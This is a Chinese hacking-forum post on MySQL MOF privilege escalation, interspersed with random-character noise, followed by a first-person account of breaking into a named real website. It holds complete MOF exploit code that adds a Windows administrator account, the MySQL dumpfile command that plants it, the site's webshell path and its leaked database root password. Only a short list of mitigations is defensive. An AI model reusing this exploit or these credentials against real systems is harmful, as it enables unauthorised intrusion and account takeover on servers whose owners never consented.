中国网络渗透测试联盟

标题: Mysql mof扩展漏洞实例与防范 [打印本页]
作者: admin    时间: 2013-1-4 19:49
标题: Mysql mof扩展漏洞实例与防范
Mysql mof扩展漏洞防范方法
5 i4 H: G5 r; m2 j( e. |" ?# C- i  B+ q
网上公开的一些利用代码:
; u+ x( M* D# {3 C% A- G( O
# R# Z  O+ ~1 T; U1 L: n+ C' T, y#pragma namespace(“\\\\.\\root\\subscription”)2 P; y7 S- S; l1 e/ D" w) `

6 m  v& u' c. D7 pinstance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };- b: b, ?* c* d0 ^" [
8 ^: ^# Q$ b9 G& U, {
0 i* d+ D8 N( _* A4 b, @" R

; b& z6 {- O4 }# O$ d % l- |7 u8 g2 {8 S2 L0 ]# @
' W# b$ D0 |$ P1 X( m4 ?( a5 F
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
4 I$ R  h+ S. y! M" }" v: N: f从上面代码来看得出解决办法:2 `; a6 d$ i9 [$ T& m6 u
% x& Q% S/ _& c  w% ?
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数
% U1 G+ |8 Q1 K- E# V: x+ r
" `5 J: K- V; p, l" a% a2、禁止使用”WScript.Shel”组件
6 @( j, j1 s1 s- _( K+ x5 `% w
9 _: Y: E4 W, ~; ^: r  v' h3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER2 u2 \' `8 ^6 w: P6 v

0 p& `% h0 b  b6 a! k5 [8 G当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下: F6 |% V) W" E0 N# f4 ?& K
; M1 B8 x; @% ^2 n2 ?
事情是这样发生的  一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权
9 g6 C# C8 E: c& |1 [9 e# g1 F5 g+ d* b# T3 l& s* b" C
但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
( e5 A2 G' E: t6 M, T- M: y% V- `4 a' G2 U
看懂了后就开始练手吧
: ~$ {3 }, d) O& }
5 d2 |. q' `) k/ whttp://www.webbmw.com/config/config_ucenter.php 一句话 a
6 U4 L, c  O" Q) P7 `' M" Z% F: W- ?1 s8 ~! K9 f  ^" k
$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
, G& U/ p6 ^# f$ g7 M1 ~, I& L: ]# C! {. P9 r# ?3 c9 x
于是直接用菜刀开搞, Q! Z. G; M$ C, S0 a3 _, C5 p

6 X( B, f- ~4 l; k上马先6 W0 F+ l6 t. k; F# E4 G

3 Z  f  h7 e3 {既然有了那些账号 之类的 于是我们就执行吧…….% n7 E  g: m5 u, K

7 s7 J3 N- k! t; R小小的说下
5 q" x" m1 |" j" G+ y9 Q, Z+ }( S6 k: {# A4 W# P; _
在这里第1次执行未成功        原因未知8 b7 [) K! ]$ H1 e$ u3 C  P
" y! D6 ?3 o! B! k3 A4 v
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
' {" k+ s9 @' H) g6 K+ e8 o! m6 L* P
#pragma namespace(“\\\\.\\root\\subscription”)
+ c% m( c) B2 f. @# W/ x1 ^2 l: C/ E5 m
instance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };/ r! A, L. h; M, m8 S& y
5 I3 Y; ]. {% {8 G" n; ?% D
我是将文件放到C:\WINDOWS\temp\1.mof: M% u1 s# L' d, Y: H! O

8 `! g* m% O7 e- A8 q* W" v* a所以我们就改下执行的代码& p* _; J7 p' m0 _
+ z- L- K7 \8 \. d
select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
  t* t( c' K  c0 V; T+ D
! i8 N% E- s; q6 h$ @, \; t' ~* E: I" n
1 M* y+ z9 S8 }& G2 c0 i2 v+ S; m* S
但是 你会发现账号还是没有躺在那里。。
; [1 q, |; I/ M/ d, x& H& f# H% ^4 w' @( [5 T/ [2 V
于是我就感觉蛋疼
, f" G" v- i3 X# l$ Q+ h% T' v% q4 i& V6 B* i6 d; t
就去一个一个去执行 但是执行到第2个 mysql时就成功了………4 h' a: r7 w+ Y, q
9 j, H! j  _5 @: p5 j/ S

, |6 j* S* m0 ~3 i* z' ^1 M3 Y# ^4 T  b: O8 r
但是其他库均不成功…
7 F$ M1 [+ q# S" K9 g
$ B1 x" c3 R4 r( I% c我就很费解呀 到底为什么不成功求大牛解答…6 S. N4 t" N5 N* l

9 k9 a/ {& [3 p+ c
0 x  I3 n7 n- a0 `% @
: w4 |% w7 d* f$ ]) o$ u



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2